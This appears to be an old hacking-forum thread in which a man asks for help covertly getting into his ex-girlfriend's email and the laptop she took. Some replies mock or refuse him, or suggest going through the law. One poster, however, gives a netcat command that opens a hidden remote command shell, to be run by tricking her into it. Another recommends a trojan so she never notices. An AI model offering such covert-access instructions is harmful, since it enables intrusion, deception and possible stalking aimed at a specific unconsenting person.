Recover files remotley

For beginners, flames not allowed...(just by the staff :P)
rodeo224

Recover files remotley

Post by rodeo224 »

Here is my story
My gf and I split up jan 10 06. When she left she took a laptop full of poetry I've written. the laptop she can have, the poetry I want back. Personaly she will have no contact with me, however she has become friends with Callie{ me} on yahoo im. I want into her email{ two poems have been published} and be able to retrieve my poems. I don't want to damage anyone or anything. when I've recovered my property, the laptop is my gift to her. I would prefer that she not find me out until I've finished. Technically the computer is my property but to try to get possession of it would not be any help, Any assistance toward this end is welcome. Not much challenge, but a worthwhile cause

Respectfully submitted

P.S. I do understand that this is something I could and should do myself. But time is of the essence here. Also since I believe I will have only one shot at this, I don't feel comfortable at my level of skill. All the expertise in the world is right here, I don't have a problem asking for help from the very best source available. Gentlemen, I thank you in advance.

DNR
Digital Mercenary
Digital Mercenary

hack?

Post by DNR »

#1. poetry files on laptop is not the same as email stored on a email server. Getting access to email on Yahoo really won't get you files off the laptop.

#2. It sounds like you want a email crack rather than your laptop or files contained on them. If I split with some bitch I would want my puter stuff back.

DNR

rodeo224

I want her email to stop her from publishing any more poems

Post by rodeo224 »

There are also poems on her email inbox, I would be happy to answer more questions, Thank you DNR for your help. You have more to say, I'm listening

rodeo224

BTW she is not some bitch, she is my xgf. I have no hard

Post by rodeo224 »

feelings whatsoever. nor do I entertain any thoughts of revenge.

Gogeta70
^_^
^_^

Post by Gogeta70 »

Send her netcat. If you don't know what netcat is, it's a program that creates a telnet server. Then tell her to type in "-L -p 2100 -t -d -e CMD" -- case sensitive. Then connect to her IP on port 2100, and you'll have a telnet connection at the cmd prompt.

Have fun.

edit: -d caused the netcat window to disappear, so that she won't figure out what you're doing.

-L - means listen
-d - hide
-t - allow telnet
-e - execute CMD
-p - port number
¯\_(ツ)_/¯ It works on my machine...

rodeo224

How would I recover the laptop?

Post by rodeo224 »

At this point I have no contact at all. She may have left the state. I can't just write this off, value of the laptop is neglible, but the contents are invaluable to me. What to do, anyone, any Ideas. The longer this takes the less likely I'll be sucessful

Gogeta70
^_^
^_^

Post by Gogeta70 »

Dude, i just fucking told you. use netcat.

rodeo224

How?

Post by rodeo224 »

How? She refuses to even speak to me. I don't know where she or the laptop is. I need to find her when she gets online somehow, At this point I don't even know if she does anything with the internet. I don't even know if her email is still good.

Gogeta70
^_^
^_^

Post by Gogeta70 »

Legal. That laptop is still legally yours, so you can use the law to get it back, take ur shit back, and give her the laptop again. Simple, you have the law on your side.

rodeo224

Yes

Post by rodeo224 »

Call the police and watch them do what? Not a high priorty for the local cop, no glory, no glamour.

DNR
Digital Mercenary
Digital Mercenary

Another hack email lamer

Post by DNR »

8)
Forget your old poetry, write new ones.
We don't hack emails for broken hearts.

DNR

rodeo224

I'll do that, thank you for your helpful advice.

Post by rodeo224 »

Inside burns a fire,
Of loves passion desire
To love unconditional
Something we all admire
To find in each other
That which we wish to aspire
Father I thank you
You have set me apart
I can’t get any higher
Than to love unconditional
Every beat of my heart

Gogeta70
^_^
^_^

Post by Gogeta70 »

They have to do something, the law is on your side, and if they don't do something about it, you can get alooot of money...

Merchant
suck-o-fied!
suck-o-fied!

Post by Merchant »

Not on the topic of g/fs ;) how does this Netcat work? it sounds like a wicked tool.

ont the topic of your g/f, being a girl myself, i would

1) try any possible ways to talk to her (email friends ect)

2) if that doesnt work then hack the laptop, i would personally use a trojan, they are harder to detect, and it would be best if she didnt know you were there at all. gain access then take the files, shed never know.

At your service
[color=red]Kill me bloody before you die.[/color]

bad_brain
Site Owner
Site Owner

Post by bad_brain »

netcat is a *nix tool with many networking possibilities, running it as a daemon or remote shell like gogeta said is just one option, check here for more info:
http://www.jfranken.de/homepages/johann ... at.en.html
:wink: